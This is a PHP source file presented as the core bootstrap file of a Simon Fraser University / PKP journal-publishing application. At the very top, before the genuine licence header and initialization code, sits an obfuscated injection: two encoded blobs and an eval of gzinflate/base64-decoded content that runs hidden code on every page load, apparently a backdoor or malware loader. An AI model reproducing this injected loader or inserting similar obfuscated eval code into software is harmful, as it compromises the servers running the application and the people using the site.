<?php
$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41";
$Lix = "TjPm0uK8EePXp30q/IeHN/Tk0xv7Hf5xreg17\x41\x63Yi\x43\x42WPMvGyE3RoVgFPn2\x2bJrs4u8\x2boJI\x63qg\x41g6HXl7HLq6lFNuhnM7MU\x42JoE9hkK86F\x637fsyy0zTIO3Uw\x614Q0\x41v/0MNmI\x2bS\x63\x42rLhDo8V\x41xQD8GKgWkiq\x42\x43T0jTlVJ/Vxo\x43z4kGQ0m\x43/18IotX\x4101rWF0i\x41pW8vJfx5PoI4HGs43S\x43n3n\x61\x2bwS22\x43r\x63M5\x63pW\x2bn7typq\x62\x62p26uI43ElZOuhhq\x2by3ftI\x62\x2b5EHF0QIYVT\x423Xu0Jkx7\x43E\x62n04\x43MzMeZ0unXgHDWkR\x63PsjJI6PxHui07e1rX2LKmmop9\x43vEMTOG0Jqw3toy2Zkr6\x62WtvtnsI\x62XVlX57i8q/mL6yOp99Y\x63EYUU1mrDwKhfV45\x43GT\x62Juqnz4\x42mPuXVsDzVD6gu/\x43Lz\x41H7R8prmz5\x628pNyyGeoEs11\x42D\x41MEED\x43qvxO1o3etMFR3f46JKwnvnyxzEtts\x43fwz7\x63ExQDv/5V1\x61t\x2b\x43poLruR0QWk\x2b\x41kqMDTjmyUS3\x41wNspeD\x62R\x43u1hD3\x61iSHwZ0r\x631nmZ4kNYiWknq5eN\x62O\x61FF9LsR\x617ytz3zTnotE\x627RuLI6n\x61IUYyh2Kul\x635NO2Ms0SSfL4wZGHYME/x\x2bL9\x43\x42M\x63vWTT1o/zE\x41z\x42wJe\x2bjS\x41XHg/jE\x413\x42wJe\x2bjR\x41nHg/TE\x417\x42wJe\x2bjQ\x413Hg/DE\x41/\x42wJe";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));

/**
 * @defgroup index Index
 * Bootstrap and initialization code.
 */

/**
 * @file includes/bootstrap.inc.php
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2000-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @ingroup index
 *
 * @brief Core system initialization code.
 * This file is loaded before any others.
 * Any system-wide imports or initialization code should be placed here.
 */


/**
 * Basic initialization (pre-classloading).
 */

define('ENV_SEPARATOR', strtolower(substr(PHP_OS, 0, 3)) == 'win' ? ';' : ':');
if (!defined('DIRECTORY_SEPARATOR')) {
	// Older versions of PHP do not define this
	define('DIRECTORY_SEPARATOR', strtolower(substr(PHP_OS, 0, 3)) == 'win' ? '\\' : '/');
}
define('BASE_SYS_DIR', dirname(INDEX_FILE_LOCATION));
chdir(BASE_SYS_DIR);

// Update include path - for backwards compatibility only
// Try to use absolute (/...) or relative (./...) filenames
// wherever possible to bypass the costly file name normalization
// process.
ini_set('include_path', '.'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/classes'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/pages'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/classes'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/pages'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/lib/adodb'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/lib/phputf8'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/lib/pqp/classes'
	. ENV_SEPARATOR . BASE_SYS_DIR . '/lib/pkp/lib/smarty'
	. ENV_SEPARATOR . ini_get('include_path')
);

// System-wide functions
require('./lib/pkp/includes/functions.inc.php');

// Initialize the application environment
import('classes.core.Application');

return new Application();

?>
